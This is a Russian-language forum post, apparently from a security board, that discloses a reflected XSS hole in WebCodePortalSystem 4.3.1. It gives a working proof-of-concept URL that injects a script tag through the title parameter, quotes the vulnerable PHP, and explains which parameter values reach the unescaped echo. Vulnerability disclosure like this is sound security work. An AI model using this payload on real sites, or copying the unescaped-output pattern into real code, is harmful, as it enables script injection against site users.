13.03.2008, 21:07
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
WebCodePortalSystem v. 4.3.1
Пассивная XSS:
Код:
http://test2.ru/php/images_jpg.php?nma=..&vara=inc&images=config.php&action=wo&title=</title><script>alert();</script>
Уязвимый кусок скрипта:
PHP код:
$path=(getenv('OS'))?dirname(getenv('DOCUMENT_ROOT')."/x")."$nma/".$vara.$slash.$images:getenv('DOCUMENT_ROOT')."$nma/".$vara.$slash.$images;
if (!file_exists($path)){$error=0;}
Вообщем что бы выполнилось условие "if ($error)", нужно что бы файл, указанный в переменной $path, существовал.
PHP код:
if ($error){
if (@$action=='wo'){
$size=getimagesize($path);
$size[2]=$size[1]+25;
if(empty($title)){$title=strtoupper($vara)." * $images";}
echo "<TITLE>$title </TITLE>
Дальше видим что значение переменной $action должно быть "wo". Ну а дальше выходим на финишную прямую "echo "<TITLE>$title </TITLE>", в переменную $title впихиваем скрипт, а остальное оставляем без изменений.
|
|
|